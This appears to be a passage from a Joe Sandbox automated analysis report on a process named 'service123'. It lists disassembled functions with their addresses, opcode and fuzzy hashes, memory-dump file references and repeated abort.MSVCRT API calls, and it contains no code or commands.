Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21da4c3bfa47d1446754176a57db6e5deb4a713e3ee7bb28add6f3bf2c20a567
Instruction ID: fb4302eb4f1cdd7fcdd121daa91878a7b4067e31cf42fb88805aaee9725489fd
Opcode Fuzzy Hash: 21da4c3bfa47d1446754176a57db6e5deb4a713e3ee7bb28add6f3bf2c20a567
Instruction Fuzzy Hash: 2B31F2B0D043498FDB10DFA9C488BDDBBF4AF09308F548458D884AB792D774A989CF92

Function 6CA9AEC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e951455fe3aa2e2a550799c574088465ae0f056eeaa493afa9792681159660
Instruction ID: 698f9ab79283e554b16af98f50ede72ad537ab455d0744ec4aa07739af8ec5e1
Opcode Fuzzy Hash: 52e951455fe3aa2e2a550799c574088465ae0f056eeaa493afa9792681159660
Instruction Fuzzy Hash: 71016D76E191408F8701FE7CC94140BB7F6BB8A319F08CA5AE84897708E634DC48CBA7

Function 6CA9BD10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81bebfb17c81a24144b1388140b99fcd104b8ba796d007bcb43fa98063ca7e8a
Instruction ID: 8282061fc8bb11a2393d3065160cdfccba94636d6677198eb6d485caa3deaf6f
Opcode Fuzzy Hash: 81bebfb17c81a24144b1388140b99fcd104b8ba796d007bcb43fa98063ca7e8a
Instruction Fuzzy Hash: DC016176A19140CF8701FE7CC981856B7F5BB8A318F48D799E44897708E634D848CBA3

Function 6CA9B4D0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1f5167f4053f0cb7fa91c0ca5e44d04ebd351c2c9195e4e71682207bc8ae54
Instruction ID: faa0123720b6bcaaacb2cf899a55cfb4e39a5d23f147c7021f5e90425f6e2281
Opcode Fuzzy Hash: 5a1f5167f4053f0cb7fa91c0ca5e44d04ebd351c2c9195e4e71682207bc8ae54
Instruction Fuzzy Hash: ED1118B69052008FD301EF29C545716BBF0BB89318F59C598D40C9B315E3BBC84ACF92

Function 6CA9C040 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df00aa21298021e6e8c0fa7ccc679e49048ccd4eff614f941fe9e0f3f848aa8
Instruction ID: 5b05f2c20a639d7feea0944d0b7483333fa85173518dfb9ed6405577b739f94b
Opcode Fuzzy Hash: 1df00aa21298021e6e8c0fa7ccc679e49048ccd4eff614f941fe9e0f3f848aa8
Instruction Fuzzy Hash: 1E018C36A19110CF8701FE7DC98141AB7F5BB4A22CF08CA69E84893709E231DC48CFA7

Function 6CAC84A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f498955f4da295c18491ac74b1e32976bc96f8649d286cb061983f7f857cd9b
Instruction ID: a8dfb270f38cf18aa61b37da7c7399f69298f72cbeb405a5a227167875a11eae
Opcode Fuzzy Hash: 1f498955f4da295c18491ac74b1e32976bc96f8649d286cb061983f7f857cd9b
Instruction Fuzzy Hash: AC017C35A092808FC301EF39858052BBBF47F5A208F49C89AE888D7305E236C849CB67

Function 6CA4D504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: f79f57f0f691566ebc98e6b66960c71445d81c0cbcfe6b31eab336cf634ba744
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: A2015EB1A052019BD704DF69C88476AFBE4EF85248F54C56DE848DB701D735D88ACBD2

Function 6CAF4360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2692fbbdc4ed1a1daa22a635edc06753b05af7d99f1c1ba0a46419fffc5a180
Instruction ID: 1bc06cb3ef52b2a5cc53d0d7627a13553b495cad24d1525799278cbba7e79733
Opcode Fuzzy Hash: e2692fbbdc4ed1a1daa22a635edc06753b05af7d99f1c1ba0a46419fffc5a180
Instruction Fuzzy Hash: F0F01D36A081408F8701FF3C864152AB7F4BB46218F88DE98E858D3705F279D899CA67

Function 6CA7A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a431689afc7a37bdf1bf793b0bf511e5111d2f7316bf33aa70cf4fd23679d2
Instruction ID: 6f93effcbbec222f7a05b66ded14b7fde3450fce50e8bb44b4f1d5ae51c1f12b
Opcode Fuzzy Hash: 13a431689afc7a37bdf1bf793b0bf511e5111d2f7316bf33aa70cf4fd23679d2
Instruction Fuzzy Hash: 93D01275E040009F8B01FF28C640826B7B1BB46208F58D984D40857705E276EC4ACF96

Function 6CA4D974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: 3e5509991c5dd06f198c68a162b92d8f8d063935a2cf59334a5baaceb297337e
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 91C01271D051104BCF00EF74C1C0078F6F1AF82248F165458D0D4E7601E775C88AC786

Function 6CA4D674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 51a72f8df488e9576e8109c4b19b55b41aca96a59086ca893fa1a730ebd58352
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: D2C01271C051104BCF40EF34C1C00B8F3F1AF82258F165858D494E7700E734D88AC746

Function 6CA4D7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: a7adbe1a240448d40c1a47918c0c61c7455db75aa45e693a2dfc8f700c3674eb
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: A7C01271C051144BCF01EF38C1C4578F3F0AF82244F165458C094D7601E734C8CAC746

Function 6CA3B1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 2838c6858982fc8740a634eb934baeced2311a252931731a7d53e04d40c146e2
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: D1C012B0C062408AC200BF389A0A238BAB0BB82208F8428ACE49053301E735C05C969B

Function 6CA2BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Strings

@, xrefs: 6CA2BAB1

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: f7f6d5df13a98a0d91605623dfffd71aa9ca7491dbed1107fd61c367c2244ab8
Instruction ID: 99d054de5a01c4ef06a859f31048bcb52551f44381da36ad479bb6a244fea5b4
Opcode Fuzzy Hash: f7f6d5df13a98a0d91605623dfffd71aa9ca7491dbed1107fd61c367c2244ab8
Instruction Fuzzy Hash: B4B12A3160932A8FC3108E2CD4A0795B7E2AB85314F4D466DEDA697B95C739EC89C781

Function 6CA22290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb14954b82c054b68924eeead9b93a51d04bd56c56b152349380a3a019a613eb
Instruction ID: d8b12ed91edc61347c823e89177441e716d47a5adfdeeb7f81f6e6e5f27bd370
Opcode Fuzzy Hash: fb14954b82c054b68924eeead9b93a51d04bd56c56b152349380a3a019a613eb
Instruction Fuzzy Hash: 05C1DE716142218FD704CF29C48475AB7E2BF85328F5C8A69D898CFB45D73DE98ACB90

Function 6CA2B7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92fd42757cf313b9e7405152d4059a7bff388f279451270d369d037031672090
Instruction ID: fe4ad3f1afce3334a2ca12af679ff5de9f11f5509077ea70d31b1c5ebb2d4d04
Opcode Fuzzy Hash: 92fd42757cf313b9e7405152d4059a7bff388f279451270d369d037031672090
Instruction Fuzzy Hash: 2641D37190A3659FD710CF29D0807167BE0EF45328F1C8A9DD9DA4BB52C339E886C741

Function 6CA228FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: c8e384648d96fad835939314f10c8ccd5cbab0a6c7b50a4dc13342f2f1d9b519
Instruction ID: e6b75ce3bc16f4b8b342f7ec2a86c0ab6d497366fa347e30650810dbd0b70ed9
Opcode Fuzzy Hash: c8e384648d96fad835939314f10c8ccd5cbab0a6c7b50a4dc13342f2f1d9b519
Instruction Fuzzy Hash: CC11C272602211CBE708FF28E991F55B7B0FB21309F059B48D594C7A11D739E859CB90

Function 6CA22A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
